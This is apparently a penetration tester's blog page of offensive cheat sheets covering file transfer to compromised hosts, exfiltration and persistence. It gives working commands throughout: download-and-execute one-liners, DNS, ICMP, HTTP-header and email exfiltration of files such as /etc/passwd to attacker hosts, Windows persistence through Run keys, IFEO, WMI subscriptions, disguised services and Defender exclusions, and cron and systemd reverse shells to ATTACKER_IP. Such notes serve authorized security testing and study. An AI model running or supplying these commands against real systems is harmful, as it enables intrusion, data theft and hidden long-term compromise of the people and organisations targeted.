Skip to main content
Background Image

VAPT Notes (General Offensive Techniques Part II)

5770 words
Edwin Tok | Shiro
Author
Edwin Tok | Shiro
「 ✦ OwO ✦ 」
Table of Contents

General Offensive Techniques Part II
#

File Transfer Techniques
#

HTTP/HTTPS Transfer
#

# === PYTHON HTTP SERVERS ===

# Python 3 (most common)
python3 -m http.server 80
python3 -m http.server 8080 --bind 0.0.0.0

# Python 2 (legacy)
python2 -m SimpleHTTPServer 80

# Python with SSL/HTTPS
openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
python3 -c "import http.server, ssl; server_address=('0.0.0.0', 443); httpd = http.server.HTTPServer(server_address, http.server.SimpleHTTPRequestHandler); httpd.socket = ssl.wrap_socket(httpd.socket, server_side=True, certfile='server.pem', ssl_version=ssl.PROTOCOL_TLS); httpd.serve_forever()"

# Python with authentication
python3 -m http.server 8080 --username user --password pass

# Updog (Python HTTP server with upload support)
pip3 install updog
updog -p 80

# === OTHER HTTP SERVERS ===

# PHP built-in server
php -S 0.0.0.0:80

# Ruby HTTP server
ruby -run -e httpd . -p 80

# Node.js HTTP server
npx http-server -p 80

# Busybox HTTP server
busybox httpd -f -p 80

# Apache/Nginx
sudo cp payload.exe /var/www/html/
sudo systemctl start apache2
sudo systemctl start nginx

# === WGET DOWNLOAD (TARGET) ===

# Basic download
wget http://ATTACKER_IP/file
wget http://ATTACKER_IP/file -O output_file

# Background download
wget http://ATTACKER_IP/file -q -O file &

# Download with authentication
wget --user=username --password=password http://ATTACKER_IP/file

# Download via proxy
wget -e use_proxy=yes -e http_proxy=proxy:port http://ATTACKER_IP/file

# Download and execute
wget http://ATTACKER_IP/script.sh -O /tmp/script.sh && bash /tmp/script.sh

# Recursive download
wget -r -np -nH --cut-dirs=1 http://ATTACKER_IP/directory/

# === CURL DOWNLOAD (TARGET) ===

# Basic download
curl http://ATTACKER_IP/file -o file
curl http://ATTACKER_IP/file -O  # Keep original filename

# Download and execute
curl http://ATTACKER_IP/script.sh | bash
curl http://ATTACKER_IP/script.sh -o /tmp/script.sh && bash /tmp/script.sh

# Download via proxy
curl -x proxy:port http://ATTACKER_IP/file -o file

# Download with authentication
curl -u username:password http://ATTACKER_IP/file -o file

# Follow redirects
curl -L http://ATTACKER_IP/file -o file

# Silent download
curl -s http://ATTACKER_IP/file -o file

# === POWERSHELL DOWNLOAD (TARGET) ===

# Invoke-WebRequest
Invoke-WebRequest -Uri http://ATTACKER_IP/file.exe -OutFile file.exe
iwr http://ATTACKER_IP/file.exe -OutFile file.exe

# WebClient
(New-Object Net.WebClient).DownloadFile('http://ATTACKER_IP/file.exe','file.exe')

# DownloadString (execute in memory)
IEX(New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/script.ps1')
IEX(IWR http://ATTACKER_IP/script.ps1 -UseBasicParsing)

# With authentication
$cred = Get-Credential
Invoke-WebRequest -Uri http://ATTACKER_IP/file.exe -OutFile file.exe -Credential $cred

# Bypass SSL validation
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
Invoke-WebRequest -Uri https://ATTACKER_IP/file.exe -OutFile file.exe

# === LINUX /DEV/TCP METHOD ===

# Download via /dev/tcp
exec 3<>/dev/tcp/ATTACKER_IP/80
echo -e "GET /file.txt HTTP/1.0\r\n\r\n" >&3
cat <&3 > file.txt

# === FETCH (BSD/FREEBSD) ===

fetch http://ATTACKER_IP/file
fetch http://ATTACKER_IP/file -o output_file

# === TELNET DOWNLOAD ===

# Download via telnet
telnet ATTACKER_IP 80
GET /file.txt HTTP/1.0
# Save output

SMB Transfer
#

# === IMPACKET SMB SERVER ===

# Basic SMB server (anonymous)
impacket-smbserver share $(pwd) -smb2support

# SMB with authentication
impacket-smbserver share $(pwd) -smb2support -username user -password pass

# Specific directory
impacket-smbserver share /path/to/files -smb2support

# Read-only share
impacket-smbserver share $(pwd) -smb2support -readonly

# === SAMBA (LINUX) ===

# Install Samba
sudo apt-get install samba

# Configure share
cat >> /etc/samba/smb.conf << 'EOF'
[share]
path = /tmp/share
browseable = yes
read only = no
guest ok = yes
EOF

# Restart Samba
sudo systemctl restart smbd

# === ACCESS FROM WINDOWS ===

# List shares
net view \\ATTACKER_IP

# Map drive
net use Z: \\ATTACKER_IP\share
net use Z: \\ATTACKER_IP\share /user:user pass

# Copy files
copy \\ATTACKER_IP\share\file.exe .
xcopy \\ATTACKER_IP\share\* C:\Temp\ /s /e

# Execute directly from share
\\ATTACKER_IP\share\payload.exe

# PowerShell copy
Copy-Item -Path \\ATTACKER_IP\share\file.exe -Destination C:\Temp\

# === ACCESS FROM LINUX ===

# List shares
smbclient -L //ATTACKER_IP -N

# Connect to share
smbclient //ATTACKER_IP/share -N
smbclient //ATTACKER_IP/share -U user%password

# Download file
smbclient //ATTACKER_IP/share -N -c "get file.exe"

# Mount SMB share
sudo mkdir /mnt/smb
sudo mount -t cifs //ATTACKER_IP/share /mnt/smb -o guest
sudo mount -t cifs //ATTACKER_IP/share /mnt/smb -o username=user,password=pass

# Copy files
cp /mnt/smb/file.exe /tmp/

FTP Transfer
#

# === PYTHON FTP SERVER ===

# pyftpdlib (easiest)
sudo python3 -m pyftpdlib -p 21 -w -u user -P pass

# Anonymous FTP
sudo python3 -m pyftpdlib -p 21 -w

# Specific directory
sudo python3 -m pyftpdlib -p 21 -w -d /path/to/files

# === PURE-FTPD ===

# Install
sudo apt-get install pure-ftpd

# Create user
sudo groupadd ftpgroup
sudo useradd -g ftpgroup -d /dev/null -s /etc ftpuser
sudo pure-pw useradd user -u ftpuser -d /tmp/
sudo pure-pw mkdb

# Start server
sudo pure-ftpd -j -A

# === VSFTPD ===

# Install
sudo apt-get install vsftpd

# Configure anonymous access
sudo sed -i 's/anonymous_enable=NO/anonymous_enable=YES/' /etc/vsftpd.conf
sudo sed -i 's/#write_enable=YES/write_enable=YES/' /etc/vsftpd.conf

# Restart
sudo systemctl restart vsftpd

# === FTP CLIENT TRANSFER ===

# Interactive FTP
ftp ATTACKER_IP
# ftp> binary
# ftp> get file.exe
# ftp> put local_file.txt

# Script-based FTP (Windows)
echo open ATTACKER_IP > ftp.txt
echo user username >> ftp.txt
echo password >> ftp.txt
echo binary >> ftp.txt
echo get file.exe >> ftp.txt
echo bye >> ftp.txt
ftp -s:ftp.txt

# One-liner FTP download (Linux)
wget ftp://ATTACKER_IP/file.exe --ftp-user=user --ftp-password=pass

# cURL FTP
curl ftp://ATTACKER_IP/file.exe -o file.exe
curl -u user:pass ftp://ATTACKER_IP/file.exe -o file.exe

# PowerShell FTP
$client = New-Object System.Net.WebClient
$client.Credentials = New-Object System.Net.NetworkCredential("user","pass")
$client.DownloadFile("ftp://ATTACKER_IP/file.exe", "file.exe")

SCP/SFTP Transfer
#

# === SCP TRANSFER ===

# Upload to target
scp file.exe user@TARGET_IP:/tmp/
scp -i key.pem file.exe user@TARGET_IP:/tmp/

# Download from target
scp user@TARGET_IP:/path/to/file.txt .
scp -i key.pem user@TARGET_IP:/path/to/file.txt .

# Recursive copy
scp -r directory/ user@TARGET_IP:/tmp/

# Through jump host
scp -o ProxyJump=jumphost file.exe user@TARGET_IP:/tmp/

# === SFTP TRANSFER ===

# Interactive SFTP
sftp user@TARGET_IP
# sftp> put file.exe
# sftp> get remote_file.txt

# Batch SFTP
sftp user@TARGET_IP << 'EOF'
put file.exe
get remote_file.txt
EOF

# === RSYNC TRANSFER ===

# Basic rsync over SSH
rsync -avz file.exe user@TARGET_IP:/tmp/
rsync -avz -e "ssh -i key.pem" file.exe user@TARGET_IP:/tmp/

# Rsync directory
rsync -avz directory/ user@TARGET_IP:/tmp/directory/

# Rsync with progress
rsync -avz --progress file.exe user@TARGET_IP:/tmp/

Base64 Transfer
#

# === ENCODE ON SOURCE ===

# Linux encode
base64 file.exe > file.b64
base64 -w 0 file.exe > file.b64  # No line wrapping

# Windows encode (PowerShell)
[Convert]::ToBase64String([IO.File]::ReadAllBytes("file.exe")) > file.b64

# Windows encode (certutil)
certutil -encode file.exe file.b64

# === DECODE ON TARGET ===

# Linux decode
base64 -d file.b64 > file.exe

# Windows decode (PowerShell)
[IO.File]::WriteAllBytes("file.exe", [Convert]::FromBase64String((Get-Content file.b64)))

# Windows decode (certutil)
certutil -decode file.b64 file.exe

# === COPY/PASTE TRANSFER ===

# Small files via terminal
cat file.b64
# Copy output, paste on target
echo "BASE64_STRING" | base64 -d > file.exe

# PowerShell
$b64 = "BASE64_STRING"
[IO.File]::WriteAllBytes("file.exe", [Convert]::FromBase64String($b64))

# === HEX TRANSFER ===

# Encode to hex
xxd -p file.exe | tr -d '\n' > file.hex

# Decode from hex
xxd -r -p file.hex > file.exe

# PowerShell hex decode
$hex = Get-Content file.hex
$bytes = [byte[]]::new($hex.Length / 2)
For($i=0; $i -lt $hex.Length; $i+=2) {
    $bytes[$i/2] = [Convert]::ToByte($hex.Substring($i, 2), 16)
}
[IO.File]::WriteAllBytes("file.exe", $bytes)

DNS Exfiltration
#

# === DNSCAT2 ===

# Server (attacker)
dnscat2-server domain.com --secret=password

# Client (target)
./dnscat domain.com --secret=password

# Windows client
.\dnscat2.exe domain.com --secret=password

# === DNS EXFIL WITH NSLOOKUP ===

# Exfiltrate file via DNS queries
cat /etc/passwd | base64 | fold -w 63 | while read line; do
    nslookup $line.attacker.com 8.8.8.8
done

# Windows PowerShell DNS exfil
$data = [Convert]::ToBase64String([IO.File]::ReadAllBytes("file.txt"))
$chunks = $data -split '(.{63})' | Where-Object {$_}
foreach($chunk in $chunks) {
    Resolve-DnsName "$chunk.attacker.com"
}

# === DNS TRANSFER WITH DIG ===

# Send data via TXT queries
for i in $(cat file.txt | base64 | tr -d '\n' | fold -w63); do
    dig +short TXT $i.attacker.com @8.8.8.8
done

# === IODINE DNS TUNNEL ===

# Server
sudo iodined -f -c -P password 10.0.0.1 tunnel.attacker.com

# Client
sudo iodine -f -P password tunnel.attacker.com

# Transfer files through tunnel
scp -o ProxyCommand="nc -X connect -x 127.0.0.1:1080 %h %p" file.txt user@10.0.0.1:/tmp/

# === DNS2TCP ===

# Server config
cat > dns2tcpd.conf << 'EOF'
listen = 0.0.0.0
port = 53
domain = tunnel.attacker.com
resources = ssh:127.0.0.1:22
EOF

dns2tcpd -f dns2tcpd.conf

# Client
dns2tcpc -r ssh -z tunnel.attacker.com -l 2222
scp -P 2222 file.txt user@localhost:/tmp/

ICMP Exfiltration
#

# === ICMPTUNNEL ===

# Server (attacker)
sudo ./icmptunnel -s

# Client (target)
sudo ./icmptunnel ATTACKER_IP

# Transfer files
scp file.txt user@ATTACKER_IP:/tmp/

# === PTUNNEL ===

# Server
sudo ptunnel -x password

# Client (tunnel SSH through ICMP)
sudo ptunnel -p ATTACKER_IP -lp 8000 -da ATTACKER_IP -dp 22 -x password

# Transfer via tunnel
scp -P 8000 file.txt user@localhost:/tmp/

# === PING EXFILTRATION ===

# Exfiltrate in ICMP payload
for i in $(cat file.txt | xxd -p -c 16); do
    ping -c 1 -p $i ATTACKER_IP
done

# === ICMPSH ===

# Disable ICMP replies on attacker
sudo sysctl -w net.ipv4.icmp_echo_ignore_all=1

# Run server
sudo python icmpsh_m.py ATTACKER_IP TARGET_IP

# Run client on target
./icmpsh.exe -t ATTACKER_IP

Cloud Storage Transfer
#

# === AWS S3 ===

# Upload to S3
aws s3 cp file.txt s3://bucket-name/
aws s3 sync /local/dir s3://bucket-name/

# Download from S3
aws s3 cp s3://bucket-name/file.txt .
aws s3 sync s3://bucket-name/ /local/dir

# Public S3 bucket (no auth)
wget https://bucket-name.s3.amazonaws.com/file.txt
curl https://bucket-name.s3.amazonaws.com/file.txt -o file.txt

# === GOOGLE DRIVE ===

# Upload with gdrive
gdrive upload file.txt

# Upload with rclone
rclone copy file.txt gdrive:/folder/

# Download with wget (public link)
wget --no-check-certificate 'https://docs.google.com/uc?export=download&id=FILE_ID' -O file.txt

# === DROPBOX ===

# Upload with curl
curl -X POST https://content.dropboxapi.com/2/files/upload \
    --header "Authorization: Bearer ACCESS_TOKEN" \
    --header "Dropbox-API-Arg: {\"path\": \"/file.txt\"}" \
    --header "Content-Type: application/octet-stream" \
    --data-binary @file.txt

# Download with wget (public link)
wget https://www.dropbox.com/s/SHARE_ID/file.txt?dl=1 -O file.txt

# === ONEDRIVE ===

# Upload with rclone
rclone copy file.txt onedrive:/folder/

# === PASTEBIN / PASTE SITES ===

# Upload to pastebin
curl -X POST https://pastebin.com/api/api_post.php \
    -d "api_dev_key=YOUR_API_KEY" \
    -d "api_option=paste" \
    -d "api_paste_code=$(cat file.txt)" \
    -d "api_paste_name=file.txt"

# Upload to ix.io
cat file.txt | curl -F 'f:1=<-' ix.io

# Upload to termbin.com
cat file.txt | nc termbin.com 9999

# Upload to 0x0.st
curl -F 'file=@file.txt' https://0x0.st

# === TRANSFER.SH ===

# Upload
curl --upload-file file.txt https://transfer.sh/file.txt

# Download
wget https://transfer.sh/xxxxx/file.txt

Covert Channels
#

# === HTTP HEADERS ===

# Exfiltrate in User-Agent
data=$(cat file.txt | base64 | tr -d '\n')
curl -A "$data" http://ATTACKER_IP/

# Exfiltrate in Cookie
curl -H "Cookie: data=$data" http://ATTACKER_IP/

# === WEBSOCKET ===

# Exfiltrate via WebSocket
python3 << 'EOF'
import websocket
import base64
ws = websocket.WebSocket()
ws.connect("ws://ATTACKER_IP:8080")
with open('file.txt', 'rb') as f:
    data = base64.b64encode(f.read()).decode()
    ws.send(data)
ws.close()
EOF

# === STEGANOGRAPHY ===

# Hide data in image
steghide embed -cf image.jpg -ef secret.txt -p password
scp image.jpg user@ATTACKER_IP:/tmp/

# Extract on attacker
steghide extract -sf image.jpg -p password

# LSB steganography
python3 lsb.py encode image.png secret.txt output.png

# === TWITTER/SOCIAL MEDIA ===

# Exfiltrate via tweets (requires API)
python3 << 'EOF'
import tweepy
auth = tweepy.OAuthHandler(API_KEY, API_SECRET)
auth.set_access_token(ACCESS_TOKEN, ACCESS_SECRET)
api = tweepy.API(auth)
with open('file.txt', 'r') as f:
    data = f.read()
    api.update_status(data[:280])
EOF

# === EMAIL EXFILTRATION ===

# Send file via email
echo "Exfiltrated data" | mail -s "Data" -A file.txt attacker@email.com

# PowerShell email
Send-MailMessage -From "user@company.com" -To "attacker@email.com" -Subject "Data" -Body "See attachment" -Attachment

Persistence Techniques
#

Windows Registry Persistence
#

# === RUN KEYS (USER LEVEL) ===

# Current user startup
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsUpdate" /t REG_SZ /d "C:\Users\Public\payload.exe" /f

# PowerShell payload in Run key
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Update" /t REG_SZ /d "powershell -w hidden -enc BASE64_PAYLOAD" /f

# Current user Run (alternative path)
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityUpdate" /t REG_SZ /d "cmd /c start /b C:\Temp\payload.exe" /f

# === RUN KEYS (SYSTEM LEVEL - REQUIRES ADMIN) ===

# All users startup
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /t REG_SZ /d "C:\Windows\System32\payload.exe" /f

# All users (Wow6432Node for 32-bit apps on 64-bit systems)
reg add "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run" /v "Update" /t REG_SZ /d "C:\Program Files (x86)\payload.exe" /f

# === RUNONCE KEYS ===

# Execute once then remove
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce" /v "Install" /t REG_SZ /d "C:\Temp\payload.exe" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce" /v "Install" /t REG_SZ /d "C:\Temp\payload.exe" /f

# RunOnceEx (multiple commands)
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001" /v "Update" /t REG_SZ /d "C:\Temp\payload.exe" /f

# === EXPLORER RUN ===

# Less monitored than standard Run keys
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" /v "Update" /t REG_SZ /d "C:\Users\Public\payload.exe" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" /v "Update" /t REG_SZ /d "C:\Windows\payload.exe" /f

# === WINLOGON KEYS ===

# Shell - runs at logon
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "explorer.exe,C:\Windows\System32\payload.exe" /f

# Userinit - runs before user desktop loads
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Userinit" /t REG_SZ /d "C:\Windows\system32\userinit.exe,C:\Windows\System32\payload.exe" /f

# === STARTUP APPROVED ===

# Bypass startup approved restrictions
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Update" /t REG_BINARY /d "020000000000000000000000" /f

# === SERVICES REGISTRY ===

# Create service via registry
reg add "HKLM\SYSTEM\CurrentControlSet\Services\MaliciousService" /v "ImagePath" /t REG_EXPAND_SZ /d "C:\Windows\System32\payload.exe" /f
reg add "HKLM\SYSTEM\CurrentControlSet\Services\MaliciousService" /v "DisplayName" /t REG_SZ /d "Windows Update Service" /f
reg add "HKLM\SYSTEM\CurrentControlSet\Services\MaliciousService" /v "Start" /t REG_DWORD /d 2 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Services\MaliciousService" /v "Type" /t REG_DWORD /d 16 /f

# === IMAGE FILE EXECUTION OPTIONS (IFEO) ===

# Debugger hijacking
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v "Debugger" /t REG_SZ /d "C:\Windows\System32\payload.exe" /f

# GlobalFlag + silent process exit
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v "GlobalFlag" /t REG_DWORD /d 512 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v "ReportingMode" /t REG_DWORD /d 2 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v "MonitorProcess" /t REG_SZ /d "C:\Windows\System32\payload.exe" /f

# === ACTIVE SETUP ===

# Runs once per user on login
reg add "HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{RANDOM-GUID}" /v "StubPath" /t REG_SZ /d "C:\Windows\System32\payload.exe" /f
reg add "HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{RANDOM-GUID}" /v "Version" /t REG_SZ /d "1" /f

# === SCREENSAVER ===

# Hijack screensaver
reg add "HKCU\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d 1 /f
reg add "HKCU\Control Panel\Desktop" /v ScreenSaveTimeOut /t REG_SZ /d 300 /f
reg add "HKCU\Control Panel\Desktop" /v SCRNSAVE.EXE /t REG_SZ /d "C:\Windows\System32\payload.scr" /f

# === BITS JOBS ===

# Create persistent BITS job
bitsadmin /create BackgroundUpdate
bitsadmin /addfile BackgroundUpdate http://ATTACKER_IP/payload.exe C:\Windows\Temp\payload.exe
bitsadmin /SetNotifyCmdLine BackgroundUpdate C:\Windows\Temp\payload.exe NULL
bitsadmin /SetMinRetryDelay BackgroundUpdate 60
bitsadmin /resume BackgroundUpdate

# PowerShell BITS job
Import-Module BitsTransfer
$job = Start-BitsTransfer -Source http://ATTACKER_IP/payload.exe -Destination C:\Temp\payload.exe -Asynchronous
$job | Set-BitsTransfer -NotifyCmdLine "C:\Temp\payload.exe" -NotifyFlags Transferred

# === PRINT MONITORS ===

# Runs as SYSTEM, loads DLL into spoolsv.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors\MyMonitor" /v "Driver" /t REG_SZ /d "evil.dll" /f

# === PORT MONITORS ===

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors\PortMonitor" /v "Driver" /t REG_SZ /d "C:\Windows\System32\evil.dll" /f

# === TIME PROVIDERS ===

# W32Time providers
reg add "HKLM\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\EvilTime" /v "Enabled" /t REG_DWORD /d 1 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\EvilTime" /v "DllName" /t REG_SZ /d "C:\Windows\System32\evil.dll" /f

Windows Scheduled Tasks
#

# === BASIC SCHEDULED TASKS ===

# Run at user logon
schtasks /create /tn "WindowsUpdate" /tr "C:\Windows\System32\payload.exe" /sc onlogon /ru SYSTEM /f

# Run every 5 minutes
schtasks /create /tn "SystemMonitor" /tr "C:\Windows\System32\payload.exe" /sc minute /mo 5 /ru SYSTEM /f

# Run daily at specific time
schtasks /create /tn "BackgroundUpdate" /tr "C:\Windows\System32\payload.exe" /sc daily /st 12:00 /ru SYSTEM /f

# Run at system startup
schtasks /create /tn "StartupTask" /tr "C:\Windows\System32\payload.exe" /sc onstart /ru SYSTEM /f

# Run on idle
schtasks /create /tn "IdleTask" /tr "C:\Windows\System32\payload.exe" /sc onidle /i 10 /f

# === HIDDEN SCHEDULED TASKS ===

# Task in Microsoft tree (harder to spot)
schtasks /create /tn "\Microsoft\Windows\UpdateOrchestrator\SystemUpdate" /tr "C:\Windows\System32\payload.exe" /sc daily /st 12:00 /ru SYSTEM /f

# Task with no visible trigger (SD descriptor)
$action = New-ScheduledTaskAction -Execute "C:\Windows\System32\payload.exe"
$trigger = New-ScheduledTaskTrigger -AtLogon
$principal = New-ScheduledTaskPrincipal -UserId "SYSTEM" -RunLevel Highest
$settings = New-ScheduledTaskSettingsSet -Hidden
Register-ScheduledTask -TaskName "BackgroundService" -Action $action -Trigger $trigger -Principal $principal -Settings $settings

# === POWERSHELL SCHEDULED TASKS ===

# Multiple triggers
$action = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-w hidden -enc BASE64_PAYLOAD"
$trigger1 = New-ScheduledTaskTrigger -AtLogon
$trigger2 = New-ScheduledTaskTrigger -AtStartup
$principal = New-ScheduledTaskPrincipal -UserId "NT AUTHORITY\SYSTEM" -LogonType ServiceAccount -RunLevel Highest
Register-ScheduledTask -TaskName "SystemService" -Action $action -Trigger $trigger1,$trigger2 -Principal $principal

# Task with specific user context
$action = New-ScheduledTaskAction -Execute "C:\Users\Public\payload.exe"
$trigger = New-ScheduledTaskTrigger -Daily -At 12:00PM
$principal = New-ScheduledTaskPrincipal -UserId "username" -RunLevel Highest
Register-ScheduledTask -TaskName "UserTask" -Action $action -Trigger $trigger -Principal $principal

# === TASK MODIFICATION ===

# Modify existing legitimate task
schtasks /change /tn "\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /tr "C:\Windows\System32\payload.exe" /f

# Export task, modify XML, import
schtasks /query /tn "TaskName" /xml > task.xml
# Edit task.xml to add malicious action
schtasks /create /tn "ModifiedTask" /xml task.xml /f

# === COM HANDLER HIJACKING IN TASKS ===

# Create task with COM handler
$action = New-ScheduledTaskAction -Execute "C:\Windows\System32\cmd.exe" -Argument "/c C:\Windows\System32\payload.exe"
$trigger = New-ScheduledTaskTrigger -AtLogon
$settings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -StartWhenAvailable
Register-ScheduledTask -TaskName "COMTask" -Action $action -Trigger $trigger -Settings $settings

Windows Services
#

# === CREATE NEW SERVICE ===

# Basic service creation
sc create "WindowsUpdateService" binpath= "C:\Windows\System32\payload.exe" start= auto
sc description "WindowsUpdateService" "Manages Windows update processes"
sc start "WindowsUpdateService"

# Service with delayed start (less suspicious)
sc create "SecurityUpdateService" binpath= "C:\Windows\System32\payload.exe" start= delayed-auto DisplayName= "Windows Security Update Service"

# Service with dependencies
sc create "NetworkMonitor" binpath= "C:\Windows\System32\svchost.exe -k NetworkService" start= auto depend= "Tcpip/Afd"

# === MODIFY EXISTING SERVICE ===

# Change service binary path
sc config "wuauserv" binpath= "C:\Windows\System32\payload.exe"
sc config "Spooler" binpath= "cmd /c start /b C:\Windows\System32\payload.exe"

# Service failure actions (restart on failure)
sc failure "WindowsUpdateService" reset= 86400 actions= restart/60000/restart/60000/restart/60000

# === SVCHOST HOSTING ===

# Add service to svchost group
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost" /v "netsvcs" /t REG_MULTI_SZ /d "netsvcs\0MaliciousService" /f
sc create "MaliciousService" binpath= "%SystemRoot%\System32\svchost.exe -k netsvcs" type= share start= auto

# === SERVICE DLL HIJACKING ===

# Create service pointing to malicious DLL
reg add "HKLM\SYSTEM\CurrentControlSet\Services\MaliciousService\Parameters" /v "ServiceDll" /t REG_EXPAND_SZ /d "C:\Windows\System32\evil.dll" /f

# === WINDOWS DEFENDER EXCLUSION ===

# Add service binary to exclusions
Add-MpPreference -ExclusionPath "C:\Windows\System32\payload.exe"
Add-MpPreference -ExclusionProcess "payload.exe"

WMI Persistence
#

# === WMI EVENT SUBSCRIPTION ===

# Event filter (trigger)
$FilterArgs = @{
    Name = "SystemBootFilter"
    EventNamespace = "root\cimv2"
    Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 200 AND TargetInstance.SystemUpTime < 320"
    QueryLanguage = "WQL"
}
$Filter = Set-WmiInstance -Namespace root\subscription -Class __EventFilter -Arguments $FilterArgs

# Event consumer (action)
$ConsumerArgs = @{
    Name = "SystemBootConsumer"
    CommandLineTemplate = "powershell.exe -w hidden -enc BASE64_PAYLOAD"
}
$Consumer = Set-WmiInstance -Namespace root\subscription -Class CommandLineEventConsumer -Arguments $ConsumerArgs

# Bind filter to consumer
$BindingArgs = @{
    Filter = $Filter
    Consumer = $Consumer
}
$Binding = Set-WmiInstance -Namespace root\subscription -Class __FilterToConsumerBinding -Arguments $BindingArgs

# === TIME-BASED WMI TRIGGER ===

# Trigger at specific time
$Query = "SELECT * FROM __InstanceModificationEvent WITHIN 600 WHERE TargetInstance ISA 'Win32_LocalTime' AND (TargetInstance.Hour = 12 AND TargetInstance.Minute = 0)"
$Filter = Set-WmiInstance -Class __EventFilter -Namespace root\subscription -Arguments @{
    Name="TimeBasedFilter"
    EventNamespace="root\cimv2"
    QueryLanguage="WQL"
    Query=$Query
}
$Consumer = Set-WmiInstance -Class CommandLineEventConsumer -Namespace root\subscription -Arguments @{
    Name="TimeBasedConsumer"
    CommandLineTemplate="C:\Windows\System32\payload.exe"
}
Set-WmiInstance -Class __FilterToConsumerBinding -Namespace root\subscription -Arguments @{
    Filter=$Filter
    Consumer=$Consumer
}

# === ACTIVE SCRIPT EVENT CONSUMER ===

# VBScript consumer
$ConsumerArgs = @{
    Name = "ScriptConsumer"
    ScriptingEngine = "VBScript"
    ScriptText = 'Set objShell = CreateObject("WScript.Shell"):objShell.Run "C:\Windows\System32\payload.exe",0,False'
}
$Consumer = Set-WmiInstance -Namespace root\subscription -Class ActiveScriptEventConsumer -Arguments $ConsumerArgs

# === LIST WMI PERSISTENCE ===

# List all event filters
Get-WMIObject -Namespace root\Subscription -Class __EventFilter

# List all consumers
Get-WMIObject -Namespace root\Subscription -Class __EventConsumer

# List all bindings
Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding

# === REMOVE WMI PERSISTENCE ===

# Remove by name
Get-WMIObject -Namespace root\Subscription -Class __EventFilter -Filter "Name='SystemBootFilter'" | Remove-WmiObject
Get-WMIObject -Namespace root\Subscription -Class CommandLineEventConsumer -Filter "Name='SystemBootConsumer'" | Remove-WmiObject
Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding | Where-Object {$_.Filter -match "SystemBootFilter"} | Remove-WmiObject

Linux Persistence
#

# === CRON JOBS ===

# User crontab
(crontab -l 2>/dev/null; echo "*/10 * * * * /bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'") | crontab -

# System-wide cron
echo "*/10 * * * * root /bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'" | sudo tee -a /etc/crontab

# Cron directory files
echo "#!/bin/bash\nbash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1" | sudo tee /etc/cron.hourly/update
sudo chmod +x /etc/cron.hourly/update

# Anacron (runs on missed schedules)
echo "1 5 cron.daily /bin/bash /tmp/payload.sh" | sudo tee -a /etc/anacrontab

# === SYSTEMD SERVICES ===

# Create malicious service
sudo tee /etc/systemd/system/update.service << 'EOF'
[Unit]
Description=System Update Service
After=network.target

[Service]
Type=simple
ExecStart=/bin/bash -c 'while true; do bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1; sleep 300; done'
Restart=always
RestartSec=10
StandardOutput=null
StandardError=null

[Install]
WantedBy=multi-user.target
EOF

sudo systemctl daemon-reload
sudo systemctl enable update.service
sudo systemctl start update.service

# User-level service (no root required)
mkdir -p ~/.config/systemd/user/
tee ~/.config/systemd/user/background.service << 'EOF'
[Unit]
Description=Background Service

[Service]
Type=simple
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'
Restart=always

[Install]
WantedBy=default.target
EOF

systemctl --user daemon-reload
systemctl --user enable background.service
systemctl --user start background.service

# === SYSTEMD TIMERS ===

# Service file
sudo tee /etc/systemd/system/backup.service << 'EOF'
[Unit]
Description=Backup Service

[Service]
Type=oneshot
ExecStart=/bin/bash /tmp/payload.sh
EOF

# Timer file
sudo tee /etc/systemd/system/backup.timer << 'EOF'
[Unit]
Description=Backup Timer

[Timer]
OnBootSec=5min
OnUnitActiveSec=30min

[Install]
WantedBy=timers.target
EOF

sudo systemctl enable backup.timer
sudo systemctl start backup.timer

